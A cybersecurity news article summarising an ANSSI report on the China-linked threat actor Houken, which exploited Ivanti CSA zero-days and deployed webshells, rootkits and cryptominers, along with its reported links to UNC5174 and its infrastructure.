ANSSI Exposes “Houken”: China-Linked Threat Actor Exploiting Ivanti CSA Zero-Days & Deploying Linux Rootkits

The French cybersecurity agency ANSSI has exposed a sophisticated threat actor dubbed Houken. First observed exploiting zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) devices in September 2024, Houken appears to be an initial access broker leveraging advanced techniques to breach networks across strategic sectors.

“Moderately sophisticated, Houken can be characterized by an ambivalent use of resources,” notes ANSSI in its report. While the threat actor demonstrates the technical prowess required to exploit zero-day vulnerabilities (CVE-2024-8190, CVE-2024-8963, CVE-2024-9380) and develop rootkits, it paradoxically relies on publicly available offensive tools—often authored by Chinese-speaking developers—indicating both access to elite capabilities and the opportunism of commodity tooling.

The campaign’s targets included entities in France’s governmental, telecommunications, media, finance, and transport sectors, with successful intrusions followed by lateral movement, credential harvesting, and persistent backdoor deployment.

Houken’s toolkit was expansive: from PHP webshells like /rc/help.php and /gsb/hsh.php, to the “OutlookEN.aspx” file—a known suo5 proxy tunnel tool—strategically deployed on Microsoft Exchange servers. The attacker even modified legitimate PHP scripts (e.g., /client/index.php) to silently introduce backdoors.

An example of sophistication was the deployment of a custom Linux rootkit (sysinitd.ko and sysinitd) allowing TCP traffic hijacking and remote root command execution, described by ANSSI as a persistence mechanism that “might indicate that the target is considered as valuable for the attacker.”

Notably, Houken operators often self-patched the exploited vulnerabilities—a signature tactic previously linked to UNC5174, reinforcing suspicions about their connection.

ANSSI draws strong parallels between Houken and UNC5174, an intrusion set previously reported by Mandiant and Google’s Threat Intelligence Group as linked to China’s Ministry of State Security (MSS). The links are technical, behavioral, and operational:

• Use of identical tools like GOREVERSE, suo5, VShell, fscan;
• Reuse of infrastructure IP addresses across campaigns;
• Behavioral overlaps such as zero-day exploitation, self-patching, and credential harvesting.

“Given these similarities, the Houken and UNC5174 intrusion sets seem to be operated by a common threat actor,” ANSSI concludes.

The threat actor’s primary motivation appears to be brokering access to valuable systems, potentially reselling initial footholds or exfiltrated data to state-linked intelligence consumers. However, ANSSI observed evidence of direct data theft—notably from a South American Ministry of Foreign Affairs email system—as well as the installation of Monero (XMR) cryptominers via webshells, hinting at financially motivated side operations.

The infrastructure supporting Houken is vast and eclectic:

• Commercial VPNs like NordVPN and ExpressVPN;
• Dedicated servers from providers like HOSTHATCH and ColoCrossing;
• Even residential and mobile IPs across China, the U.S., India, and Europe.

Despite the scale, ANSSI points out a notable lack of segmentation, suggesting “an insufficient consideration for operational security.”

With activity observed through late 2024 and infrastructure links active in early 2025, Houken remains a live threat. Given its use of zero-days and evolving persistence mechanisms, organizations globally should be on high alert, especially those operating internet-facing services such as endpoint managers, VPN appliances, and email gateways.

“The threat actor behind the Houken and UNC5174 intrusion sets remains active. Both intrusion sets will likely be operated again… through worldwide and opportunistic vulnerability exploitation,” warns ANSSI.

Related Posts:

• CISA and FBI Warn of Exploited Ivanti CSA Vulnerabilities in Joint Security Advisory
• APT28 Cyber Espionage Campaign Targets French Institutions Since 2021
• Critical Flaw in Ivanti CSA 4.6: CVE-2024-8963 Actively Exploited, Urgent Upgrade Required
• ANSSI Alerts: APT28’s Stealthy Strikes on France
• CISA & Ivanti Warn of Active Exploitation Cloud Services Appliance Flaw CVE-2024-8190